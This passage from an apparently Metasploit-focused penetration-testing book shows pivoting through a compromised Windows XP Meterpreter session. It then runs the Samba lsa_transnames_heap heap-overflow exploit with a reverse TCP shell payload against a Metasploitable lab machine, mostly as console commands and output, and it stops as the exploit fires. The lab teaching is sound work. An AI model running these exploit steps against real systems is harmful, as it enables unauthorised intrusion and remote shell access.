background image

90

Chapter 6

We have successfully compromised our Windows XP machine and have 

full access to it. Next, we background our running session at   and add a 

route

 command to the Framework at  , telling it to route the remote net-

work ID over session 1, the background Meterpreter session. We then display 
active routes with 

route print

 at  , and we can clearly see at   that, just as we 

desired, the route is active.

Next, we’ll set up a second exploit against the targeted Linux system. 

The specific exploit here is a Samba-based heap overflow, which would be 
vulnerable on our Metasploitable machine.

use msf exploit(handler) > 

use linux/samba/lsa_transnames_heap

msf exploit(lsa_transnames_heap) > 

set payload linux/x86/shell/reverse_tcp

payload => linux/x86/shell/reverse_tcp
msf exploit(lsa_transnames_heap) > 

set LHOST 10.10.1.129

 

LHOST => 10.10.1.129
msf exploit(lsa_transnames_heap) > 

set LPORT 8080

LPORT => 8080
msf exploit(lsa_transnames_heap) > 

set RHOST 192.168.33.132

 

RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) > 

ifconfig

 

[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:47:e6:79
          inet addr:10.10.1.129  Bcast:10.10.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe47:e679/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:23656 errors:0 dropped:0 overruns:0 frame:0
          TX packets:32321 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4272582 (4.2 MB)  TX bytes:17849775 (17.8 MB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:600 errors:0 dropped:0 overruns:0 frame:0
          TX packets:600 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:41386 (41.3 KB)  TX bytes:41386 (41.3 KB)

msf exploit(lsa_transnames_heap) > 

exploit

[*] Started reverse handler on 10.10.1.129:8080
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...